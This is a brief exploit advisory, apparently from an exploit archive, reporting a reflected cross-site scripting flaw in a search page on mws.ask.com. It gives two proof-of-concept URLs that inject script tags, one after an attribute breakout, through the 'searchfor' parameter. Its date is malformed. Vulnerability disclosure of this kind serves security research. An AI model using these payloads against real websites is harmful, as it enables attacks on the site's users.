# Exploit Title: ASK XSS # Date: 05.00.2012 # Author: TayfunBasoglu # Tested: BackTrack 5 # Platform: jhtml ------------------------------------------------------------------ http://mws.ask.com/mywebsearch/AJmain.jhtml?searchfor=XSS <script>alert("TayfunBasoglu")</script> http://mws.ask.com/mywebsearch/AJmain.jhtml?searchfor="><script>alert("TayfunBasoglu")</script> ------------------------------------------------------------------ tayfunbasoglu.blogspot.com twitter.com/tayfunbasoglu